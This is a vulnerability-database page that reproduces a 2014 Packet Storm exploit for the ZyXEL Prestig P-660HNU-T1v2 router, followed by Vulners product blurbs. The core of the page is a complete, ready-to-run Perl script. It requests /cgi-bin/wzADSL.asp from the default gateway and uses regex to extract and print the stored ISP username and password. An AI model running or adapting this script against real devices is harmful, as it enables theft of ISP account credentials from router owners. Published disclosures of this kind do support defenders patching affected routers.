Lucene search
K

ZyXEL Prestig P-660HNU-T1v2 Credential Disclosure

🗓️ 25 Sep 2014 00:00:00Reported by Sebastian MagofType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 36 Views

ZyXEL Prestig P-660HNU-T1v2 local ISP username and password disclosure exploit using Per

Code
`#!/usr/bin/perl  
# Exploit Author: Sebastián Magof  
# Hardware: ZyXEL Prestig P-660HNU-T1  
# Vulnerable file: wzADSL.asp  
# location: http://gateway/cgi-bin/wzADSL.asp  
# Bug: ISP usr+pwd disclosure  
# Type: Local  
# Date: 22/09/2014  
# Vendor Homepage: http://www.zyxel.com/  
# Version: 2.00(AAIJ.1)  
# Tested on: Linux Fedora 20/Windows 7  
# (\/)  
# (**) Alpha (:  
#(")(")  
#usage:perl exploit.pl  
use LWP::UserAgent;  
use HTTP::Request;  
#begin  
print "\n\n************************************************************\n";  
print "* ZyXEL Prestig MODELO P-660HNU-T1v2 local ISP usr+pwd *\n";#default gateway 192.168.1.1 (Arnet Telecom ISP Argentina)  
print "************************************************************\n\n";#in oher country modify $url line 25  
  
  
#isp pwd disclosure file  
my $url = "http://192.168.1.1/cgi-bin/wzADSL.asp";  
  
  
#UserAgent  
my $ua = LWP::UserAgent->new();  
$ua->agent("Mozilla/5.0");  
  
  
#Request.  
my $req = HTTP::Request->new(GET => $url);  
my $request = $ua->request($req);  
my $content = $request->content(); #content  
my ($usr) = $content =~ m/name="wan_UserName" size="30" maxlength="128" value="(.+)" >/;  
my ($pwd) = $content =~ m/name="wan_Password" size="30" maxlength="128" value="(.+)">/;  
#ISP usr+pwd Arnet Telecom Argentina;  
print "User: $usr\n";  
print "Password: $pwd\n\n";  
exit(0);  
  
  
  
__EOF__  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation